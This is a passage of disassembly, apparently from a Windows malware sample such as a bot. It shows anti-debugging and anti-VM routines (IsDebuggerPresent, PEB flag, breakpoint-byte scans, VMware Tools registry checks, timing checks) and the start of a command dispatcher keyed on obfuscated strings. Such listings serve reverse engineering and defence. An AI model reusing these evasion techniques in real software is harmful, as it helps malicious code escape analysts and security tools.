jz short loc_40A80D
loc_40A7FE: ; CODE XREF: sub_40A7C5+2C�j
push offset aIsdebuggerpres ; "IsDebuggerPresent"
push eax
call dword_437030 ; GetProcAddress
mov [ebp+var_4], eax
loc_40A80D: ; CODE XREF: sub_40A7C5+37�j
call sub_40A61A
call dword_437188 ; GetTickCount
mov [ebp+var_C], eax
mov esi, offset sub_40A91C
mov al, [esi]
cmp al, 0CCh
jz short loc_40A82A
xor eax, eax
jmp short loc_40A82F
; ---------------------------------------------------------------------------
loc_40A82A: ; CODE XREF: sub_40A7C5+5F�j
mov eax, 1
loc_40A82F: ; CODE XREF: sub_40A7C5+63�j
test al, al
jz short loc_40A83B
loc_40A833: ; CODE XREF: sub_40A7C5+9F�j
; sub_40A7C5+A8�j ...
xor edi, edi
inc edi
jmp loc_40A90B
; ---------------------------------------------------------------------------
loc_40A83B: ; CODE XREF: sub_40A7C5+6C�j
mov [ebp+var_8], offset aDaemon ; "DAEMON"
push 0
push [ebp+var_8]
mov eax, large fs:30h
movzx eax, byte ptr [eax+2]
or al, al
jz short loc_40A857
jmp short loc_40A85B
; ---------------------------------------------------------------------------
loc_40A857: ; CODE XREF: sub_40A7C5+8E�j
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40A85B: ; CODE XREF: sub_40A7C5+90�j
mov eax, 1
leave
retn
; ---------------------------------------------------------------------------
test al, al
jnz short loc_40A833
call loc_40A514
test al, al
jnz short loc_40A833
call sub_40A5A4
test al, al
jnz short loc_40A833
call sub_40A62E
test eax, eax
jnz short loc_40A833
call sub_40A662
test eax, eax
jnz short loc_40A833
call sub_40A737
xor edi, edi
inc edi
test eax, eax
jnz short loc_40A90B
push edi
mov ebx, offset aSoftwareVmware ; "SOFTWARE\\VMware, Inc.\\VMware Tools"
push offset aInstallpath ; "InstallPath"
mov esi, 80000002h
push ebx
push esi
call sub_421092
add esp, 10h
test eax, eax
jnz short loc_40A90B
push 4
push offset aShowtray ; "ShowTray"
push ebx
push esi
call sub_421092
add esp, 10h
test eax, eax
jnz short loc_40A90B
cmp [ebp+var_4], eax
jz short loc_40A8FB
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
mov esi, [ebp+var_8]
mov al, [esi]
cmp al, 0CCh
jz short loc_40A8E1
xor eax, eax
jmp short loc_40A8E6
; ---------------------------------------------------------------------------
loc_40A8E1: ; CODE XREF: sub_40A7C5+116�j
mov eax, 1
loc_40A8E6: ; CODE XREF: sub_40A7C5+11A�j
test al, al
jnz short loc_40A90B
call [ebp+var_4]
test eax, eax
jnz short loc_40A90B
call dword_4370B0 ; IsDebuggerPresent
test eax, eax
jnz short loc_40A90B
loc_40A8FB: ; CODE XREF: sub_40A7C5+107�j
call dword_437188 ; GetTickCount
sub eax, [ebp+var_C]
cmp eax, 1388h
jbe short loc_40A915
loc_40A90B: ; CODE XREF: sub_40A7C5+71�j
; sub_40A7C5+CF�j ...
mov dword_456210, edi
mov eax, edi
jmp short loc_40A917
; ---------------------------------------------------------------------------
loc_40A915: ; CODE XREF: sub_40A7C5+144�j
xor eax, eax
loc_40A917: ; CODE XREF: sub_40A7C5+15�j
; sub_40A7C5+14E�j
pop edi
pop esi
pop ebx
leave
retn
sub_40A7C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A91C proc near ; DATA XREF: sub_40A7C5+56�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
mov al, [esi]
cmp al, 0CCh
jz short loc_40A92D
xor eax, eax
jmp short loc_40A932
; ---------------------------------------------------------------------------
loc_40A92D: ; CODE XREF: sub_40A91C+B�j
mov eax, 1
loc_40A932: ; CODE XREF: sub_40A91C+F�j
pop esi
pop ebp
retn
sub_40A91C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A935 proc near ; CODE XREF: sub_40A9FE+869�p
; sub_40A9FE+9244�p ...
var_5A8 = byte ptr -5A8h
var_5A7 = byte ptr -5A7h
var_1A8 = byte ptr -1A8h
var_154 = byte ptr -154h
var_100 = dword ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 5A8h
push ebx
push esi
push edi
lea eax, [ebp+var_5A8]
push [ebp+arg_0]
push eax
call dword_4370B4 ; lstrcpyA
cmp [ebp+var_5A7], 0
jz loc_40A9F6
mov al, [ebp+var_5A8]
cmp al, byte_4439A0
jnz loc_40A9F6
push 40h
lea eax, [ebp+var_100]
push [ebp+arg_0]
push eax
call sub_42777F
mov ebx, eax
lea eax, [ebp+var_100]
push ebx
push eax
lea eax, [ebp+var_1A8]
push eax
call sub_42030A
add esp, 18h
cmp [ebp+var_100], 0
mov esi, eax
lea edi, [ebp+var_154]
push 15h
pop ecx
rep movsd
jz short loc_40A9F6
mov eax, [ebp+var_100]
mov al, [eax]
cmp al, byte_4439A0
jnz short loc_40A9F6
push [ebp+arg_10]
inc [ebp+var_100]
lea eax, [ebp+var_5A8]
lea esi, [ebp+var_154]
sub esp, 54h
push 15h
pop ecx
mov edi, esp
push [ebp+arg_8]
rep movsd
push [ebp+arg_4]
push eax
lea eax, [ebp+var_100]
push ebx
push eax
call sub_40A9FE
add esp, 6Ch
loc_40A9F6: ; CODE XREF: sub_40A935+23�j
; sub_40A935+35�j ...
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
leave
retn
sub_40A935 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9FE proc near ; CODE XREF: sub_40A935+B9�p
; sub_42045F+10E�p
var_6DBB0 = byte ptr -6DBB0h
var_6B4A0 = byte ptr -6B4A0h
var_68D90 = byte ptr -68D90h
var_66680 = byte ptr -66680h
var_63F70 = byte ptr -63F70h
var_61860 = byte ptr -61860h
var_5F150 = byte ptr -5F150h
var_5CA40 = byte ptr -5CA40h
var_5A330 = byte ptr -5A330h
var_57C20 = byte ptr -57C20h
var_55510 = byte ptr -55510h
var_52E00 = byte ptr -52E00h
var_506F0 = byte ptr -506F0h
var_4DFE0 = byte ptr -4DFE0h
var_4B8D0 = byte ptr -4B8D0h
var_491C0 = byte ptr -491C0h
var_46AB0 = byte ptr -46AB0h
var_443A0 = byte ptr -443A0h
var_41C90 = byte ptr -41C90h
var_3F580 = byte ptr -3F580h
var_3CE70 = byte ptr -3CE70h
var_3A760 = byte ptr -3A760h
var_38050 = byte ptr -38050h
var_35940 = byte ptr -35940h
var_33230 = byte ptr -33230h
var_30B20 = byte ptr -30B20h
var_2E410 = byte ptr -2E410h
var_2BD00 = byte ptr -2BD00h
var_295F0 = byte ptr -295F0h
var_26EE0 = byte ptr -26EE0h
var_247D0 = byte ptr -247D0h
var_220C0 = byte ptr -220C0h
var_1F9B0 = byte ptr -1F9B0h
var_1D2A0 = byte ptr -1D2A0h
var_1AB90 = byte ptr -1AB90h
var_18480 = byte ptr -18480h
var_15D70 = byte ptr -15D70h
var_13660 = byte ptr -13660h
var_10F50 = byte ptr -10F50h
var_E840 = byte ptr -0E840h
var_C131 = byte ptr -0C131h
var_C130 = byte ptr -0C130h
var_9A20 = byte ptr -9A20h
var_7310 = byte ptr -7310h
var_7180 = byte ptr -7180h
var_6D80 = byte ptr -6D80h
var_6C7C = dword ptr -6C7Ch
var_6C78 = byte ptr -6C78h
var_6878 = byte ptr -6878h
var_6478 = byte ptr -6478h
var_63F8 = dword ptr -63F8h
var_63F4 = dword ptr -63F4h
var_63F0 = dword ptr -63F0h
var_63E8 = dword ptr -63E8h
var_63E4 = dword ptr -63E4h
var_63E0 = dword ptr -63E0h
var_63DC = dword ptr -63DCh
var_63D8 = dword ptr -63D8h
var_63D4 = byte ptr -63D4h
var_62D0 = byte ptr -62D0h
var_61CC = byte ptr -61CCh
var_60CC = byte ptr -60CCh
var_5FC8 = byte ptr -5FC8h
var_5EC8 = byte ptr -5EC8h
var_5DC4 = byte ptr -5DC4h
var_5CC0 = byte ptr -5CC0h
var_5BC0 = dword ptr -5BC0h
var_5BBC = dword ptr -5BBCh
var_5ABC = byte ptr -5ABCh
var_59BC = byte ptr -59BCh
var_32AC = byte ptr -32ACh
var_31AC = byte ptr -31ACh
var_30AC = byte ptr -30ACh
var_2FAC = byte ptr -2FACh
var_2EA8 = byte ptr -2EA8h
var_2DA4 = byte ptr -2DA4h
var_2D24 = byte ptr -2D24h
var_2C20 = byte ptr -2C20h
var_2B80 = byte ptr -2B80h
var_2A7C = byte ptr -2A7Ch
var_2978 = dword ptr -2978h
var_2968 = dword ptr -2968h
var_28E4 = dword ptr -28E4h
var_28E0 = dword ptr -28E0h
var_285C = byte ptr -285Ch
var_27D8 = dword ptr -27D8h
var_27D4 = dword ptr -27D4h
var_27CC = dword ptr -27CCh
var_27C8 = byte ptr -27C8h
var_2748 = byte ptr -2748h
var_26C8 = byte ptr -26C8h
var_2648 = dword ptr -2648h
var_2644 = dword ptr -2644h
var_2640 = dword ptr -2640h
var_263C = dword ptr -263Ch
var_2638 = dword ptr -2638h
var_25B4 = dword ptr -25B4h
var_257C = dword ptr -257Ch
var_2574 = byte ptr -2574h
var_2470 = byte ptr -2470h
var_236C = byte ptr -236Ch
var_2268 = byte ptr -2268h
var_2230 = byte ptr -2230h
var_21F8 = byte ptr -21F8h
var_21C0 = dword ptr -21C0h
var_21B8 = byte ptr -21B8h
var_2124 = byte ptr -2124h
var_2020 = byte ptr -2020h
var_1F98 = dword ptr -1F98h
var_1F94 = dword ptr -1F94h
var_1F8C = byte ptr -1F8Ch
var_1F54 = byte ptr -1F54h
var_1F1C = dword ptr -1F1Ch
var_1F18 = byte ptr -1F18h
var_1E98 = byte ptr -1E98h
var_1E18 = byte ptr -1E18h
var_1D98 = dword ptr -1D98h
var_1D94 = dword ptr -1D94h
var_1D90 = dword ptr -1D90h
var_1D8C = dword ptr -1D8Ch
var_1D88 = dword ptr -1D88h
var_1D84 = dword ptr -1D84h
var_1D80 = dword ptr -1D80h
var_1D7C = dword ptr -1D7Ch
var_1D78 = byte ptr -1D78h
var_1D44 = dword ptr -1D44h
var_1D3C = byte ptr -1D3Ch
var_1CBC = byte ptr -1CBCh
var_1C34 = dword ptr -1C34h
var_1C2C = dword ptr -1C2Ch
var_1C28 = dword ptr -1C28h
var_1C24 = dword ptr -1C24h
var_1C20 = dword ptr -1C20h
var_1C18 = dword ptr -1C18h
var_1C14 = dword ptr -1C14h
var_1C10 = byte ptr -1C10h
var_1B90 = byte ptr -1B90h
var_1B10 = dword ptr -1B10h
var_1B08 = dword ptr -1B08h
var_1B04 = dword ptr -1B04h
var_1AFC = dword ptr -1AFCh
var_1AF8 = dword ptr -1AF8h
var_1AF4 = dword ptr -1AF4h
var_1AF0 = dword ptr -1AF0h
var_1AEC = byte ptr -1AECh
var_1A6C = dword ptr -1A6Ch
var_1A34 = dword ptr -1A34h
var_1A2C = dword ptr -1A2Ch
var_1A28 = byte ptr -1A28h
var_19A8 = dword ptr -19A8h
var_197C = dword ptr -197Ch
var_1978 = dword ptr -1978h
var_1970 = dword ptr -1970h
var_1968 = dword ptr -1968h
var_1964 = byte ptr -1964h
var_18E4 = byte ptr -18E4h
var_1864 = dword ptr -1864h
var_1860 = dword ptr -1860h
var_185C = dword ptr -185Ch
var_1858 = dword ptr -1858h
var_1854 = dword ptr -1854h
var_1850 = dword ptr -1850h
var_184C = dword ptr -184Ch
var_1848 = byte ptr -1848h
var_17C8 = byte ptr -17C8h
var_1748 = dword ptr -1748h
var_1744 = dword ptr -1744h
var_173C = dword ptr -173Ch
var_1738 = dword ptr -1738h
var_1734 = dword ptr -1734h
var_1730 = dword ptr -1730h
var_172C = dword ptr -172Ch
var_1724 = byte ptr -1724h
var_16A4 = byte ptr -16A4h
var_161C = dword ptr -161Ch
var_1618 = dword ptr -1618h
var_1614 = dword ptr -1614h
var_1610 = dword ptr -1610h
var_160C = dword ptr -160Ch
var_1608 = dword ptr -1608h
var_1600 = dword ptr -1600h
var_15FC = dword ptr -15FCh
var_15F4 = byte ptr -15F4h
var_1574 = byte ptr -1574h
var_14EC = dword ptr -14ECh
var_14E8 = dword ptr -14E8h
var_14E4 = dword ptr -14E4h
var_14E0 = dword ptr -14E0h
var_14DC = dword ptr -14DCh
var_14D8 = dword ptr -14D8h
var_14D0 = dword ptr -14D0h
var_14CC = dword ptr -14CCh
var_14C4 = byte ptr -14C4h
var_1444 = byte ptr -1444h
var_13BC = dword ptr -13BCh
var_13B8 = dword ptr -13B8h
var_13B4 = dword ptr -13B4h
var_13B0 = dword ptr -13B0h
var_13AC = dword ptr -13ACh
var_13A8 = dword ptr -13A8h
var_13A0 = dword ptr -13A0h
var_139C = dword ptr -139Ch
var_1398 = byte ptr -1398h
var_1318 = byte ptr -1318h
var_1298 = dword ptr -1298h
var_1294 = dword ptr -1294h
var_1290 = dword ptr -1290h
var_128C = dword ptr -128Ch
var_1288 = dword ptr -1288h
var_1284 = dword ptr -1284h
var_127C = dword ptr -127Ch
var_1278 = dword ptr -1278h
var_1274 = byte ptr -1274h
var_11F4 = byte ptr -11F4h
var_1174 = dword ptr -1174h
var_1170 = dword ptr -1170h
var_116C = dword ptr -116Ch
var_1168 = dword ptr -1168h
var_1164 = dword ptr -1164h
var_1160 = dword ptr -1160h
var_115C = dword ptr -115Ch
var_1158 = dword ptr -1158h
var_1154 = byte ptr -1154h
var_10D4 = byte ptr -10D4h
var_1054 = dword ptr -1054h
var_1050 = dword ptr -1050h
var_104C = dword ptr -104Ch
var_1048 = dword ptr -1048h
var_1044 = dword ptr -1044h
var_1040 = dword ptr -1040h
var_103C = dword ptr -103Ch
var_1038 = dword ptr -1038h
var_1034 = byte ptr -1034h
var_FB4 = byte ptr -0FB4h
var_F34 = dword ptr -0F34h
var_F30 = dword ptr -0F30h
var_F2C = dword ptr -0F2Ch
var_F28 = dword ptr -0F28h
var_F24 = dword ptr -0F24h
var_F20 = dword ptr -0F20h
var_F1C = dword ptr -0F1Ch
var_F18 = dword ptr -0F18h
var_F14 = byte ptr -0F14h
var_E94 = dword ptr -0E94h
var_E84 = dword ptr -0E84h
var_E80 = dword ptr -0E80h
var_E68 = dword ptr -0E68h
var_E64 = dword ptr -0E64h
var_E5C = dword ptr -0E5Ch
var_E54 = dword ptr -0E54h
var_E50 = byte ptr -0E50h
var_DD0 = dword ptr -0DD0h
var_DC0 = dword ptr -0DC0h
var_DBC = dword ptr -0DBCh
var_DA4 = dword ptr -0DA4h
var_DA0 = dword ptr -0DA0h
var_D98 = dword ptr -0D98h
var_D90 = byte ptr -0D90h
var_D5C = byte ptr -0D5Ch
var_D28 = byte ptr -0D28h
var_CF4 = byte ptr -0CF4h
var_CE4 = dword ptr -0CE4h
var_CE0 = byte ptr -0CE0h
var_C60 = dword ptr -0C60h
var_C58 = dword ptr -0C58h
var_C54 = dword ptr -0C54h
var_C50 = dword ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_C48 = dword ptr -0C48h
var_C44 = byte ptr -0C44h
var_BC4 = dword ptr -0BC4h
var_BC0 = dword ptr -0BC0h
var_BBC = dword ptr -0BBCh
var_BB8 = dword ptr -0BB8h
var_BB4 = dword ptr -0BB4h
var_BB0 = dword ptr -0BB0h
var_BAC = byte ptr -0BACh
var_B2C = dword ptr -0B2Ch
var_B1C = dword ptr -0B1Ch
var_B00 = dword ptr -0B00h
var_AFC = dword ptr -0AFCh
var_AF8 = dword ptr -0AF8h
var_AF4 = dword ptr -0AF4h
var_AEC = dword ptr -0AECh
var_AE8 = byte ptr -0AE8h
var_A68 = dword ptr -0A68h
var_A4C = dword ptr -0A4Ch
var_A3C = dword ptr -0A3Ch
var_A38 = dword ptr -0A38h
var_A30 = dword ptr -0A30h
var_A28 = dword ptr -0A28h
var_A24 = byte ptr -0A24h
var_970 = dword ptr -970h
var_964 = dword ptr -964h
var_95C = byte ptr -95Ch
var_85C = dword ptr -85Ch
var_858 = dword ptr -858h
var_850 = dword ptr -850h
var_848 = dword ptr -848h
var_840 = dword ptr -840h
var_838 = dword ptr -838h
var_834 = dword ptr -834h
var_82C = dword ptr -82Ch
var_828 = byte ptr -828h
var_7A8 = dword ptr -7A8h
var_7A4 = dword ptr -7A4h
var_77C = dword ptr -77Ch
var_778 = dword ptr -778h
var_774 = dword ptr -774h
var_770 = dword ptr -770h
var_768 = byte ptr -768h
var_728 = dword ptr -728h
var_724 = byte ptr -724h
var_6A4 = dword ptr -6A4h
var_6A0 = dword ptr -6A0h
var_69C = dword ptr -69Ch
var_694 = dword ptr -694h
var_690 = dword ptr -690h
var_68C = dword ptr -68Ch
var_678 = dword ptr -678h
var_674 = dword ptr -674h
var_670 = dword ptr -670h
var_66C = dword ptr -66Ch
var_664 = dword ptr -664h
var_660 = byte ptr -660h
var_5E0 = dword ptr -5E0h
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = dword ptr -5C4h
var_5B4 = dword ptr -5B4h
var_5B0 = dword ptr -5B0h
var_5AC = dword ptr -5ACh
var_5A8 = dword ptr -5A8h
var_5A0 = dword ptr -5A0h
var_59C = byte ptr -59Ch
var_51C = dword ptr -51Ch
var_518 = dword ptr -518h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4E4 = dword ptr -4E4h
var_4DC = dword ptr -4DCh
var_4D8 = byte ptr -4D8h
var_458 = dword ptr -458h
var_454 = dword ptr -454h
var_450 = dword ptr -450h
var_448 = dword ptr -448h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_418 = byte ptr -418h
var_314 = byte ptr -314h
var_304 = byte ptr -304h
var_2F4 = word ptr -2F4h
var_2F2 = word ptr -2F2h
var_2F0 = dword ptr -2F0h
var_2E4 = byte ptr -2E4h
var_2D4 = byte ptr -2D4h
var_2C4 = byte ptr -2C4h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = dword ptr -200h
var_1F8 = dword ptr -1F8h
var_174 = byte ptr -174h
var_164 = byte ptr -164h
var_154 = byte ptr -154h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = word ptr -90h
var_8E = dword ptr -8Eh
var_80 = byte ptr -80h
var_7C = dword ptr -7Ch
var_70 = dword ptr -70h
var_6C = byte ptr -6Ch
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_2C = dword ptr 34h
arg_30 = dword ptr 38h
arg_34 = dword ptr 3Ch
arg_38 = byte ptr 40h
arg_3C = dword ptr 44h
arg_40 = dword ptr 48h
arg_44 = dword ptr 4Ch
arg_48 = dword ptr 50h
arg_4C = dword ptr 54h
arg_50 = dword ptr 58h
arg_54 = dword ptr 5Ch
arg_58 = dword ptr 60h
arg_5C = dword ptr 64h
arg_60 = dword ptr 68h
arg_64 = dword ptr 6Ch
arg_68 = dword ptr 70h
push ebp
mov ebp, esp
mov eax, 6DBB0h
call sub_429B60
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
cmp [ebp+arg_68], esi
push edi
mov edi, dword_437178
jz short loc_40AA51
push dword ptr [ebx]
push offset aDehziSaO0 ; "deHZI/SA//o0"
call edi ; dword_437178
test eax, eax
jz loc_414995
push dword ptr [ebx]
push offset aEuior0ay2w7__0 ; "EUIOR0ay2w7."
call edi ; dword_437178
test eax, eax
jz loc_414995
push dword ptr [ebx]
push offset aUc6wg1ovwvt1 ; "uc6Wg1OvWVt1"
call edi ; dword_437178
test eax, eax
jz loc_414995
loc_40AA51: ; CODE XREF: sub_40A9FE+1E�j
cmp [ebp+arg_24], esi
jz loc_40AE0F
push dword ptr [ebx]
push offset aOb4iqKj5ue_ ; "Ob4iQ/KJ5ue."
call edi ; dword_437178
test eax, eax
jnz short loc_40AA86
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push 6
loc_40AA6E: ; CODE XREF: sub_40A9FE+9C�j
; sub_40A9FE+B2�j ...
push esi
mov eax, [ebp+arg_C]
push [ebp+arg_20]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [eax+0Ch]
jmp loc_412CB2
; ---------------------------------------------------------------------------
loc_40AA86: ; CODE XREF: sub_40A9FE+67�j
push dword ptr [ebx]
push offset aHyomeIovtv_ ; "HyOMe/iovtV."
call edi ; dword_437178
test eax, eax
jnz short loc_40AA9C
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push 2
jmp short loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AA9C: ; CODE XREF: sub_40A9FE+93�j
push dword ptr [ebx]
push offset a47ff020f_0_ ; "47Ff/020f.0."
call edi ; dword_437178
test eax, eax
jnz short loc_40AAB2
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push 1
jmp short loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AAB2: ; CODE XREF: sub_40A9FE+A9�j
push dword ptr [ebx]
push offset aG3obv_r6j7h ; "g3obv.r6j7H/"
call edi ; dword_437178
test eax, eax
jnz short loc_40AAC8
push offset aLtlec18us5q0 ; "LTLec18US5q0"
push 12h
jmp short loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AAC8: ; CODE XREF: sub_40A9FE+BF�j
push dword ptr [ebx]
push offset aM5spx_qp7lx_ ; "M5sPX.Qp7Lx."
call edi ; dword_437178
test eax, eax
jnz short loc_40AADE
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push 13h
jmp short loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AADE: ; CODE XREF: sub_40A9FE+D5�j
push dword ptr [ebx]
push offset a9ljbh07crkd_ ; "9lJBH07crkD."
call edi ; dword_437178
test eax, eax
jnz short loc_40AAF7
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
push 14h
jmp loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AAF7: ; CODE XREF: sub_40A9FE+EB�j
push dword ptr [ebx]
push offset aVp1weJvqbn_ ; "VP1WE/JVQbn."
call edi ; dword_437178
test eax, eax
jnz short loc_40AB10
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push 4
jmp loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AB10: ; CODE XREF: sub_40A9FE+104�j
push dword ptr [ebx]
push offset aQbwgd0cfxf_ ; "qbwGd0CFxf./"
call edi ; dword_437178
test eax, eax
jz loc_40AE03
push dword ptr [ebx]
push offset a2mo7g0_b0qj ; "2mo7G0.B0qj/"
call edi ; dword_437178
test eax, eax
jz loc_40AE03
push dword ptr [ebx]
push offset a9bwj__lz2my0 ; "9bWj..lZ2My0"
call edi ; dword_437178
test eax, eax
jnz short loc_40AB5B
push [ebp+arg_20]
mov eax, [ebp+arg_C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [eax+0Ch]
call sub_4033A3
jmp loc_41479B
; ---------------------------------------------------------------------------
loc_40AB5B: ; CODE XREF: sub_40A9FE+13F�j
push dword ptr [ebx]
push offset aH1cmq0wqw5c_ ; "h1cMQ0wQw5C."
call edi ; dword_437178
test eax, eax
jz loc_40ADF7
push dword ptr [ebx]
push offset aSxytb1_eejq_ ; "SXYtb1.EEjQ."
call edi ; dword_437178
test eax, eax
jz loc_40ADF7
push dword ptr [ebx]
push offset aVb1r0N_arr0 ; "vB1r0/N.Arr0"
call edi ; dword_437178
test eax, eax
jz loc_40ADF7
push dword ptr [ebx]
push offset a8im6i__c829_ ; "8Im6i..C829."
call edi ; dword_437178
test eax, eax
jz loc_40ADF7
push dword ptr [ebx]
push offset aTiyj208fhvn_ ; "tIYj208FHvN."
call edi ; dword_437178
test eax, eax
jz loc_40ADF7
push dword ptr [ebx]
push offset a5ngN0zjh2i1 ; "5nG/N0ZJh2i1"
call edi ; dword_437178
test eax, eax
jz loc_40ADF7
push dword ptr [ebx]
push offset aMdf9n0kzpx60 ; "mdf9n0kzPX60"
call edi ; dword_437178
test eax, eax
jz loc_40ADF7
push dword ptr [ebx]
push offset aAtfv_jgk0x1 ; "/ATfv.jgK0X1"
call edi ; dword_437178
test eax, eax
jz loc_40ADF7
push dword ptr [ebx]
push offset aFu6k10irsc1 ; "fu6k10iRsc/1"
call edi ; dword_437178
test eax, eax
jz loc_40ADF7
push dword ptr [ebx]
push offset a_luua_bruje0 ; ".lUua.bruje0"
call edi ; dword_437178
test eax, eax
jnz short loc_40AC0D
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push 9
jmp loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AC0D: ; CODE XREF: sub_40A9FE+201�j
push dword ptr [ebx]
push offset aUycsBekwp0 ; "/uYcs/BEKWP0"
call edi ; dword_437178
test eax, eax
jnz short loc_40AC26
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
push 0Ah
jmp loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AC26: ; CODE XREF: sub_40A9FE+21A�j
push dword ptr [ebx]
push offset aFhzdv1ootfg0 ; "fhzdV1OotFg0"
call edi ; dword_437178
test eax, eax
jnz short loc_40AC3F
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push 0Bh
jmp loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AC3F: ; CODE XREF: sub_40A9FE+233�j
push dword ptr [ebx]
push offset aUfbss0cbo8c__0 ; "uFbSS0Cbo8C."
call edi ; dword_437178
test eax, eax
jnz short loc_40AC53
push offset aHuudgYqzdz ; "HuuDG/YQZDz/"
jmp short loc_40AC65
; ---------------------------------------------------------------------------
loc_40AC53: ; CODE XREF: sub_40A9FE+24C�j
push dword ptr [ebx]
push offset aNoazx1alvg0 ; "NoaZx1Alvg/0"
call edi ; dword_437178
test eax, eax
jnz short loc_40AC6C
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
loc_40AC65: ; CODE XREF: sub_40A9FE+253�j
push 11h
jmp loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AC6C: ; CODE XREF: sub_40A9FE+260�j
push dword ptr [ebx]
push offset aSud8hRsu8j1 ; "sUd8h/rsu8j1"
call edi ; dword_437178
test eax, eax
jz loc_40ADEB
push dword ptr [ebx]
push offset aJ2yyw_j09xc ; "j2yYw.J09XC/"
call edi ; dword_437178
test eax, eax
jz loc_40ADEB
push dword ptr [ebx]
push offset aRiocl1kztwo0 ; "rioCl1kzTWO0"
call edi ; dword_437178
test eax, eax
jnz short loc_40ACA7
push offset aWulzr_x7xjb0 ; "WUlZR.X7XjB0"
push 15h
jmp loc_40AA6E
; ---------------------------------------------------------------------------
loc_40ACA7: ; CODE XREF: sub_40A9FE+29B�j
push dword ptr [ebx]
push offset a7fugu_n0u2m1 ; "7FUgU.N0U2m1"
call edi ; dword_437178
test eax, eax
jnz short loc_40ACBE
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
jmp loc_40ADE4
; ---------------------------------------------------------------------------
loc_40ACBE: ; CODE XREF: sub_40A9FE+2B4�j
push dword ptr [ebx]
push offset aUbqs_hzpkh1 ; "/uBQS.HZPkh1"
call edi ; dword_437178
test eax, eax
jz loc_40ADDF
push dword ptr [ebx]
push offset a6x7zf1eztny_ ; "6x7zf1EztnY."
call edi ; dword_437178
test eax, eax
jz loc_40ADDF
push dword ptr [ebx]
push offset aFyflu0ji3xh_ ; "FyFlU0jI3XH."
call edi ; dword_437178
test eax, eax
jz loc_40ADDF
push dword ptr [ebx]
push offset a7otcu0fic6v0 ; "7otcU0FiC6V0"
call edi ; dword_437178
test eax, eax
jz loc_40ADDF
push dword ptr [ebx]
push offset aXmz20Gjkq ; "xMz20//gJkQ/"
call edi ; dword_437178
test eax, eax
jnz short loc_40AD19
push offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
jmp loc_40ADE4
; ---------------------------------------------------------------------------
loc_40AD19: ; CODE XREF: sub_40A9FE+30F�j
